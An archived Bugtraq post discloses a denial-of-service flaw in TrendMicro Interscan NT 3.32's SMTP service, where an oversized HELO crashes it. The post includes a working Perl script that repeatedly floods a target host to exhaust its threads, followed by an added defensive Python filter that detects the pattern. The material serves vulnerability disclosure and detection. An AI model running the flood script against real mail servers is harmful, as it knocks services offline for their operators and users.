Bugtraq mailing list archives

New DOS on Interscan NT/3.32


From: Alain.Thivillon () HSC FR (Alain Thivillon)
Date: Mon, 17 Apr 2000 16:30:03 +0200


One month ago, during an audit, we found a new remote DOS on TrendMicro
Interscan for NT (last version V3.32, build 1011 and 1022).

Last October, USSR Labs found a buffer overflow in the HELO command, and
wrote a very nice exploit with shell code, giving SYSTEM shell access to a
remote attacker. Trendmicro closed the hole; unfortunately the patch
was not complete: by sending a HELO followed by exactly 4075 to 4090
characters, the SMTP task crashes immediately. Depending on your currently
installed NT debugger, this crash can stop all other SMTP threads (if
DRWatson is called) or just reduce the number of remaining incoming threads
(default value is 25).

We sent our problem to TrendMicro, their reaction was very nice and they
sent us a new fixed version 3 days after; however I don't know if this
version has been released to the public.

Below is a perl script you can use to test your vulnerability; the Nessus
version scheduled for today will include a NASL script.

--
Alain Thivillon -+- Alain.Thivillon () hsc fr -+- Hervé Schauer Consultants

#!/usr/bin/perl

# (c) Alain Thivillon & Stephane Aubert
#     Herve Schauer Consultants 2000
#     http://www.hsc.fr/
#
#     Do not use this stuff against Microsoft MX hosts :)
#
# Crash Interscan SMTP Server on Windows NT Version 3.32 Builds 1011 and 1022
# Depending on the debugger installed on NT, the crash can be immediate if you use
# Drwatson.32.exe (new connections get stuck), or can be limited to a single
# thread if Auto=0 in the NT Debug key. Interscan limits the number of running
# threads (default 25) so it's very easy to exhaust all threads and finally
# force the answer '452 Too Busy'

use Socket;
use FileHandle;

$vict=$ARGV[0];

# Old-style constants and sockaddr_in pack template (pre-Socket.pm idiom)
$AF_INET = 2;
$SOCK_STREAM = 1;
$port=25;
$sockaddr = 'S n a4 x8';
# $proto was used below without being set in the original; resolve TCP explicitly
$proto = getprotobyname('tcp');

($name, $aliases, $type, $len, $thataddr) = gethostbyname($vict);
$that = pack($sockaddr, $AF_INET, $port, $thataddr);

while (1) {
  $mysock=new FileHandle;
  socket($mysock, $AF_INET, $SOCK_STREAM, $proto) || die "socket failed\n";
  connect($mysock, $that) || die "Connect failed\n";
  select($mysock); $| = 1; select(STDOUT); $| = 1;

  $line = <$mysock>;
  print $line;
  print $mysock "HELO ",'a'x4075,"\r\n";
  $line = <$mysock>;
  print $line;
  close $mysock;
}
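As an added example (not part of the original post, and not TrendMicro's or HSC's code), here is a small Python check written from the defender's side, usable in an SMTP front-end filter or over a captured session log: it flags HELO/EHLO arguments that fall in the 4075 to 4090 byte window the post describes, and more generally any argument above the 255-octet domain limit of RFC 5321. That second threshold is an assumed policy choice, not something the post states.

```python
import re

# Crash window reported in the advisory for Interscan NT 3.32 builds 1011/1022.
CRASH_MIN, CRASH_MAX = 4075, 4090
# Assumed policy limit: RFC 5321 caps a domain at 255 octets; anything longer
# is not a legitimate HELO argument and is worth rejecting before it reaches
# the scanning engine.
RFC_DOMAIN_MAX = 255

# Match "HELO arg" / "EHLO arg" with an optional trailing CRLF; arg is non-greedy
# so the line terminator is not counted in the argument length.
_HELO_RE = re.compile(rb'^(HELO|EHLO)[ \t]+(.*?)\r?\n?$', re.IGNORECASE)


def classify_helo(line: bytes) -> dict:
    """Classify one raw SMTP command line.

    verdict is one of: 'not-helo', 'ok', 'oversize', 'interscan-dos-range'.
    """
    m = _HELO_RE.match(line)
    if not m:
        return {"verb": None, "arg_len": 0, "verdict": "not-helo"}
    verb, arg = m.group(1).upper().decode(), m.group(2)
    n = len(arg)
    if CRASH_MIN <= n <= CRASH_MAX:
        verdict = "interscan-dos-range"   # exact signature of the crash case
    elif n > RFC_DOMAIN_MAX:
        verdict = "oversize"              # generic policy violation
    else:
        verdict = "ok"
    return {"verb": verb, "arg_len": n, "verdict": verdict}


def scan_session(lines):
    """Return (line_no, verb, arg_len, verdict) for every suspicious HELO/EHLO."""
    alerts = []
    for i, line in enumerate(lines, 1):
        r = classify_helo(line)
        if r["verdict"] in ("oversize", "interscan-dos-range"):
            alerts.append((i, r["verb"], r["arg_len"], r["verdict"]))
    return alerts


# Constructed sample session (not captured traffic): a normal greeting, an
# unrelated command, an over-long EHLO, and a HELO in the crash window.
SAMPLE = [
    b"HELO mail.example.org\r\n",
    b"MAIL FROM:<user@example.org>\r\n",
    b"EHLO " + b"a" * 300 + b"\r\n",
    b"HELO " + b"a" * 4075 + b"\r\n",
]

if __name__ == "__main__":
    for a in scan_session(SAMPLE):
        print("line %d: %s argument of %d bytes -> %s" % a)
```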


